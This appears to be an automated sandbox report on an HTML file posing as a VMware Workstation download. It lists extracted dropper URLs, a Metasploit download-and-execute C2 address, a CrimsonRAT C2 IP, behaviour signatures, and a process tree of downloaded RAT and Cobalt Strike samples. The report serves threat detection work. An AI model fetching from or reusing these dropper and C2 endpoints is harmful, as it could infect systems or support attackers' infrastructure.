Analysis

  • max time kernel
    609s
  • max time network
    719s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04-10-2024 22:54

General

  • Target

    VMware-Workstation-16-Pro-07-10.html

  • Size

    8KB

  • MD5

    634b27ba5944fa78e8e883c32150c3c4

  • SHA1

    c038f37c15d77658362bdcaa7cab9a560fb8d908

  • SHA256

    9c90fa883bcb26af0cda67641d4b4aa1138f102552fb1608c41e51c253219ade

  • SHA512

    07fc70e3aeefa8455f792cf16bd6d1a920beafb8e260c3e3fd89290d4170d2c6ba084f66fa5c1335b5e3d1815a7224a920ed55766672112ccd4c4494e6619bc2

  • SSDEEP

    96:fsuWzPkloqaj5fjmZ/1yyyrh5HPJjeIJumKF95RZjieojwXZkn8oqPTi:mn7m5EtJJjeeu1hkrn88

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Family

metasploit

Version

windows/download_exec

C2

http://149.129.72.37:23456/SNpK

Attributes
  • headers User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP09; NP09; MAAU)

Extracted

Family

crimsonrat

C2

185.136.161.124

Signatures

  • CrimsonRAT main payload 1 IoCs
  • CrimsonRat

    Crimson RAT is a malware linked to a Pakistani-linked threat actor.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables cmd.exe use via registry modification 1 IoCs
  • Downloads MZ/PE file
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 12 IoCs
  • Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 4 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 58 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 14 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 15 IoCs
  • Opens file in notepad (likely ransom note) 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 31 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\VMware-Workstation-16-Pro-07-10.html
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2440
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd7d6ccc40,0x7ffd7d6ccc4c,0x7ffd7d6ccc58
      2⤵
        PID:4688
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1796 /prefetch:2
        2⤵
          PID:3480
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2076 /prefetch:3
          2⤵
            PID:1452
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2148,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2380 /prefetch:8
            2⤵
              PID:4208
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3060 /prefetch:1
              2⤵
                PID:1680
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3212 /prefetch:1
                2⤵
                  PID:4124
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3536,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4564 /prefetch:8
                  2⤵
                    PID:4640
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4568,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4724 /prefetch:1
                    2⤵
                      PID:2664
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5044,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4832 /prefetch:1
                      2⤵
                        PID:2608
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5020,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4872 /prefetch:1
                        2⤵
                          PID:3580
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5004,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5216 /prefetch:1
                          2⤵
                            PID:2660
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5432,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5372 /prefetch:1
                            2⤵
                              PID:3076
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5428,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5512 /prefetch:1
                              2⤵
                                PID:4996
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5748,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5720 /prefetch:1
                                2⤵
                                  PID:392
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5744,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6112 /prefetch:1
                                  2⤵
                                    PID:4384
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=6088,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5672 /prefetch:1
                                    2⤵
                                      PID:4064
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6216,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6356 /prefetch:1
                                      2⤵
                                        PID:2832
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5756,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5760 /prefetch:1
                                        2⤵
                                          PID:552
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5240,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5048 /prefetch:8
                                          2⤵
                                            PID:4648
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5556,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5532 /prefetch:8
                                            2⤵
                                              PID:3660
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6188,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6352 /prefetch:1
                                              2⤵
                                                PID:928
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6376,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5860 /prefetch:1
                                                2⤵
                                                  PID:3404
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5904,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6572 /prefetch:8
                                                  2⤵
                                                  • NTFS ADS
                                                  PID:8
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5116,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5940 /prefetch:8
                                                  2⤵
                                                  • NTFS ADS
                                                  PID:4724
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5092,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6100 /prefetch:8
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3492
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5072,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5488 /prefetch:1
                                                  2⤵
                                                    PID:3884
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6316,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6564 /prefetch:1
                                                    2⤵
                                                      PID:3196
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4988,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6444 /prefetch:8
                                                      2⤵
                                                        PID:5036
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6672,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6680 /prefetch:8
                                                        2⤵
                                                          PID:2832
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6304,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5712 /prefetch:1
                                                          2⤵
                                                            PID:3140
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=4836,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6508 /prefetch:1
                                                            2⤵
                                                              PID:2472
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=4840,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6576 /prefetch:1
                                                              2⤵
                                                                PID:408
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3040,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6736 /prefetch:8
                                                                2⤵
                                                                  PID:2240
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6668,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6872 /prefetch:8
                                                                  2⤵
                                                                    PID:1676
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6728,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6804 /prefetch:8
                                                                    2⤵
                                                                    • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                    • NTFS ADS
                                                                    PID:4780
                                                                  • C:\Users\Admin\Downloads\7z2408-x64.exe
                                                                    "C:\Users\Admin\Downloads\7z2408-x64.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Modifies registry class
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:1488
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6052,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4296 /prefetch:8
                                                                    2⤵
                                                                    • NTFS ADS
                                                                    PID:5288
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6924,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=212 /prefetch:8
                                                                    2⤵
                                                                    • NTFS ADS
                                                                    PID:5752
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7116,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7100 /prefetch:8
                                                                    2⤵
                                                                      PID:5236
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7132,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6992 /prefetch:8
                                                                      2⤵
                                                                        PID:5528
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7136,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7060 /prefetch:8
                                                                        2⤵
                                                                        • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                        • NTFS ADS
                                                                        PID:5360
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4296,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7288 /prefetch:8
                                                                        2⤵
                                                                        • NTFS ADS
                                                                        PID:3172
                                                                      • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                        "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\CobaltStrike.doc" /o ""
                                                                        2⤵
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:2620
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          C:\Windows\SysWOW64\rundll32.exe
                                                                          3⤵
                                                                          • Process spawned unexpected child process
                                                                          • Blocklisted process makes network request
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4300
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=2672,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7244 /prefetch:8
                                                                        2⤵
                                                                          PID:6052
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7164,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7240 /prefetch:8
                                                                          2⤵
                                                                          • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                          • NTFS ADS
                                                                          PID:2668
                                                                        • C:\Users\Admin\Downloads\CrimsonRAT.exe
                                                                          "C:\Users\Admin\Downloads\CrimsonRAT.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:6136
                                                                          • C:\ProgramData\Hdlharas\dlrarhsiva.exe
                                                                            "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:2832
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7504,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7516 /prefetch:8
                                                                          2⤵
                                                                          • NTFS ADS
                                                                          PID:5460
                                                                        • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                                          "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • NTFS ADS
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:6072
                                                                          • C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe
                                                                            "C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            PID:5832
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7280,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7352 /prefetch:8
                                                                          2⤵
                                                                          • NTFS ADS
                                                                          PID:2888
                                                                        • C:\Windows\System32\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Bolbi.vbs"
